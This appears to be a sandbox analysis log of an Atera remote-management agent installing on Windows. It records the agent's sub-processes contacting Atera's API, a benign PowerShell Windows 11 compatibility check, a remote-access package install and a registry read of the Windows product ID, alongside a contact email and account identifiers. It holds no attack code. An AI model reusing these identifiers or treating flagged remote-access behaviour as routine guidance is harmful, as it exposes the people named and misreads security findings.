                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -command " ################################################################################################ # windows 11 compatibility check script # ################################################################################################ # compatibility flag $iscompatible = $true # check if current os is windows 10 $osversion = (get-ciminstance -class win32_operatingsystem).caption if (-not $osversion.contains('windows 10')) { return } # architecture x64 $arch = (get-ciminstance -class cim_computersystem).systemtype $archvalue = 'x64-based pc' if ($arch -ne $archvalue) { $iscompatible = $false } # screen resolution $screeninfo = (get-ciminstance -classname win32_videocontroller).currentverticalresolution $valuemin = 720 if ($screeninfo -le $valuemin) { $iscompatible = $false } # cpu composition $core = (get-ciminstance -class cim_processor | select-object *).numberofcores $corevalue = 2 $frequency = (get-ciminstance -class cim_processor | select-object *).maxclockspeed $frequencyvalue = 1000 if (-not (($core -ge $corevalue) -and ($frequency -ge $frequencyvalue))) { $iscompatible = $false } # tpm $tpm2 = $false if ((get-tpm).manufacturerversionfull20) { $tpm2 = -not (get-tpm).manufacturerversionfull20.contains('not supported') } if ($tpm2 -contains $false) { $iscompatible = $false } # secure boot $secureboot = confirm-securebootuefi if ($secureboot -ne $true) { $iscompatible = $false } # ram available $memory = (get-ciminstance -class cim_computersystem).totalphysicalmemory $setminmemory = 4294967296 if ($memory -lt $setminmemory) { $iscompatible = $false } # storage available $listdisk = get-ciminstance -class win32_logicaldisk | where-object { $_.drivetype -eq '3' } $setminsizelimit = 64gb $diskcompatible = $false foreach ($disk in $listdisk) { if ($disk.freespace -ge $setminsizelimit) { $diskcompatible = $true } } if (-not $diskcompatible) { $iscompatible = $false } # output final result $iscompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kiiwiumvxdwvzdfblcm1pc3npb25pchrpb24iom51bgwsiljlcxvpcmvqyxnzd29yze9wdglvbii6bnvsbcwiugfzc3dvcmqiom51bgx9" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/production 443 or8ixli90mf "syncprofile" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagesystemtools\agentpackagesystemtools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/production 443 or8ixli90mf "probe" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/production 443 or8ixli90mf "monitor" 001q300000p2oapiaz
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="contato@fazendadoscordeiros.com.br" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000p2oapiaz" /agentid="52187e48-563c-468d-9785-3542f81fb412"Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kiiwiumvxdwvzdfblcm1pc3npb25pchrpb24iom51bgwsiljlcxvpcmvqyxnzd29yze9wdglvbii6bnvsbcwiugfzc3dvcmqiom51bgx9" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagesystemtools\agentpackagesystemtools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/production 443 or8ixli90mf "probe" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/production 443 or8ixli90mf "monitor" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -command " ################################################################################################ # windows 11 compatibility check script # ################################################################################################ # compatibility flag $iscompatible = $true # check if current os is windows 10 $osversion = (get-ciminstance -class win32_operatingsystem).caption if (-not $osversion.contains('windows 10')) { return } # architecture x64 $arch = (get-ciminstance -class cim_computersystem).systemtype $archvalue = 'x64-based pc' if ($arch -ne $archvalue) { $iscompatible = $false } # screen resolution $screeninfo = (get-ciminstance -classname win32_videocontroller).currentverticalresolution $valuemin = 720 if ($screeninfo -le $valuemin) { $iscompatible = $false } # cpu composition $core = (get-ciminstance -class cim_processor | select-object *).numberofcores $corevalue = 2 $frequency = (get-ciminstance -class cim_processor | select-object *).maxclockspeed $frequencyvalue = 1000 if (-not (($core -ge $corevalue) -and ($frequency -ge $frequencyvalue))) { $iscompatible = $false } # tpm $tpm2 = $false if ((get-tpm).manufacturerversionfull20) { $tpm2 = -not (get-tpm).manufacturerversionfull20.contains('not supported') } if ($tpm2 -contains $false) { $iscompatible = $false } # secure boot $secureboot = confirm-securebootuefi if ($secureboot -ne $true) { $iscompatible = $false } # ram available $memory = (get-ciminstance -class cim_computersystem).totalphysicalmemory $setminmemory = 4294967296 if ($memory -lt $setminmemory) { $iscompatible = $false } # storage available $listdisk = get-ciminstance -class win32_logicaldisk | where-object { $_.drivetype -eq '3' } $setminsizelimit = 64gb $diskcompatible = $false foreach ($disk in $listdisk) { if ($disk.freespace -ge $setminsizelimit) { $diskcompatible = $true } } if (-not $diskcompatible) { $iscompatible = $false } # output final result $iscompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E739C cpuid 35_2_00007FFDEE3E739C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
